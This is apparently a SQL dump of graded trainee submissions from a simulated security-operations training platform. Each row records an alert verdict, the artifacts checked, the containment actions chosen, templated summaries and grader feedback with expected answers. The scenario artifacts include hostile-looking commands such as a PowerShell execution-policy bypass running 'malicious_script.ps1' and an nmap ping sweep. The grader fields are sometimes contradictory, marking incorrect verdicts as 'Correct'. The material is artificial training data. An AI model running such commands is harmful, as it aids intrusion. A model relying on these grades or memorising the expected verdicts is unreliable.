(434, 225, 1376, 'graded', 60, 'Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.50\",\"ip-203.0.113.150\",\"domain-suspicious-w\"],\"selectedActions\":[\"block_hash\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:43:00 PM\\nALERT: Suspicious Domain Access Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.50\\n- [IP] 203.0.113.150\\n- [DOMAIN] suspicious-website.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:43:03.169Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-07 14:47:04', '2026-03-07 11:42:04', '2026-03-07 11:43:03', 0, NULL),
(435, 225, 1388, 'graded', 60, 'Incorrect verdict. Expected false_positive, got true_positive. All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.101\",\"ip-192.168.2.25\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:44:57 PM\\nALERT: Suspicious Login Activity\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.101\\n- [IP] 192.168.2.25\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:44:59.588Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got true_positive. All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-07 14:54:02', '2026-03-07 11:44:02', '2026-03-07 11:44:59', 0, NULL),
(436, 225, 1381, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.20\",\"ip-203.0.113.95\",\"hash-d41d8cd9\"],\"selectedActions\":[\"block_ip\",\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:45:59 PM\\nALERT: Suspicious File Downloaded from Public IP\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.20\\n- [IP] 203.0.113.95\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:46:07.596Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 14:51:12', '2026-03-07 11:45:12', '2026-03-07 11:46:07', 0, NULL),
(437, 225, 601, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-45.67.89.123\",\"ip-192.168.1.10\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:50:23 PM\\nALERT: Brute Force Attack Detected on Corporate Server\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 45.67.89.123\\n- [IP] 192.168.1.10\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:50:25.321Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-07 14:59:36', '2026-03-07 11:49:36', '2026-03-07 11:50:25', 0, NULL),
(438, 225, 217, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:54:07 PM\\nALERT: Suspicious Remote Login Attempt Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [USERNAME] NotAvailable\\n- [USERNAME] Guest\\n- [USERNAME] LOCAL\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:54:10.051Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-07 15:00:33', '2026-03-07 11:52:33', '2026-03-07 11:54:10', 0, NULL),
(439, 225, 1266, 'graded', 85, 'Verdict is correct (+40). Missed critical artifacts: command nmap -sP 192.168.3.0/24 (1/2). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.3.45\",\"ip-192.168.3.1\",\"cmd-1\"],\"selectedActions\":[\"collect_forensics\",\"isolate_host\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 10:57:36 PM\\nALERT: Internal Reconnaissance Detected via Network Scanning\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.3.45\\n- [IP] 192.168.3.1\\n- [COMMAND] nmap -sP 192.168.3.0/24\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T11:57:45.017Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command nmap -sP 192.168.3.0/24 (1/2). Response actions correct (+30)\",\"missed_items\":[\"command: nmap -sP 192.168.3.0/24\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 11:55:22', '2026-03-07 11:57:45', 0, NULL),
(440, 232, 270, 'graded', 60, 'Incorrect verdict. Expected True Positive, got false_positive. All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"escalate\",\"reset_credentials\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 7:21:12 PM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T13:51:15.649Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected True Positive, got false_positive. All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-03-07 12:57:07', '2026-03-07 13:51:15', 0, NULL),
(441, 232, 271, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 7:23:25 PM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T13:53:28.023Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"reset_credentials\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 13:51:15', '2026-03-07 13:53:28', 0, NULL),
(442, 232, 272, 'graded', 95, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (5/6)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 7:26:18 PM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T13:56:20.232Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (5/6)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-07 13:53:28', '2026-03-07 13:56:20', 0, NULL),
(443, 232, 274, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-07 13:57:28', '2026-03-07 13:57:28', 0, NULL),
(444, 259, 581, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.101\",\"hash-5f4dcc3b5aa765d61d8327deb882cf99,098f6bcd4621d373cade4e832627b4f6,e99a18c428cb38d5f260853678922e03\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 07/03/2026, 20:26:55\\nALERT: Anomalous File Access Patterns [OP: Operation Credit Bureau]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.101\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99,098f6bcd4621d373cade4e832627b4f6,e99a18c428cb38d5f260853678922e03\\n- [FILENAME] /finance/2023_budgets.xlsx\\n- [FILENAME] /hr/employee_records.docx\\n- [FILENAME] /legal/contracts/nda.pdf\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T19:27:45.306Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-07 22:27:57', '2026-03-07 19:22:57', '2026-03-07 19:27:45', 0, NULL),
(447, 189, 319, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.5\",\"ip-192.168.1.45\",\"domain-http://malic\",\"artifact_1\",\"artifact_2\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:48:53 AM\\nALERT: Suspicious Email Detected [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 203.0.113.5\\n- [IP] 192.168.1.45\\n- [DOMAIN] http://maliciousdomain.com/login\\n- [EMAIL] attacker@maliciousdomain.com\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [FILENAME] Invoice_2023.pdf\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-03-09T02:49:06.880Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-08 22:12:30', '2026-03-09 02:49:06', 0, NULL),
(448, 225, 1373, 'graded', 85, 'Verdict is correct (+40). Missed critical artifacts: command C:\\Windows\\System32\\cmd.exe /c malicious.exe (1/2). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"hash-e3b0c442\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:32:54 PM\\nALERT: Malware Detected via Suspicious Process Execution\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.100\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [COMMAND] C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:32:56.225Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe (1/2). Response actions correct (+30)\",\"missed_items\":[\"command: C:\\\\Windows\\\\System32\\\\cmd.exe /c malicious.exe\"],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:11:11', '2026-03-09 02:04:11', '2026-03-09 02:32:56', 0, NULL),
(449, 225, 641, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.112\",\"ip-10.0.0.10\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:34:08 PM\\nALERT: Unauthorized Access Attempt on Admin Account\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.112\\n- [IP] 10.0.0.10\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:34:11.274Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:42:21', '2026-03-09 02:33:21', '2026-03-09 02:34:11', 0, NULL),
(450, 225, 1384, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.200\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:35:14 PM\\nALERT: Unauthorized Admin Login Attempt\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 203.0.113.200\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:38:05.847Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:44:26', '2026-03-09 02:34:26', '2026-03-09 02:38:05', 0, NULL),
(451, 225, 1382, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.55\",\"ip-203.0.113.85\",\"domain-malicious-cr\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:42:01 PM\\nALERT: Credential Harvesting Attempt via Phishing Site\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.55\\n- [IP] 203.0.113.85\\n- [DOMAIN] malicious-credentials.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:42:09.236Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:49:43', '2026-03-09 02:40:43', '2026-03-09 02:42:09', 0, NULL),
(452, 225, 1393, 'graded', 70, 'Verdict is correct (+40). Missed critical artifacts: command powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Write-Host \'Hello World\'\" (0/1). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.6.15\",\"cmd-1\",\"artifact_3\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:43:31 PM\\nALERT: Suspicious Command Execution on Workstation\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.6.15\\n- [COMMAND] powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\"\\n- [USERNAME] klee\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:43:36.835Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\" (0/1). Response actions correct (+30)\",\"missed_items\":[\"command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\"\"],\"strengths\":\"Needs improvement\"}', '2026-03-09 05:49:21', '2026-03-09 02:42:21', '2026-03-09 02:43:36', 0, NULL),
(453, 225, 1391, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.4.10\",\"ip-93.184.216.34\",\"artifact_3\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:45:25 PM\\nALERT: Unusual Network Connection to External IP\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.4.10\\n- [IP] 93.184.216.34\\n- [USERNAME] psmith\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:45:30.995Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-09 05:54:14', '2026-03-09 02:44:14', '2026-03-09 02:45:30', 0, NULL),
(454, 225, 643, 'graded', 60, 'Incorrect verdict. Expected false_positive, got benign. Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.50\",\"ip-10.0.0.15\",\"artifact_2\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"benign\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 1:46:57 PM\\nALERT: False Positive: User Access from Known Location\\nVERDICT: BENIGN\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 198.51.100.50\\n- [IP] 10.0.0.15\\n- [USERNAME] mike\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-09T02:47:02.798Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Incorrect verdict. Expected false_positive, got benign. Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', '2026-03-09 05:54:39', '2026-03-09 02:45:39', '2026-03-09 02:47:02', 0, NULL),
(455, 189, 320, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.57\",\"ip-10.0.0.45\",\"hash-b1946ac9\",\"cmd-1\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/9/2026, 3:51:01 AM\\nALERT: Unauthorized Application Execution [OP: Operation Silent Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.57\\n- [IP] 10.0.0.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious_script.ps1\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-09T02:51:16.367Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-09 02:49:06', '2026-03-09 02:51:16', 0, NULL),
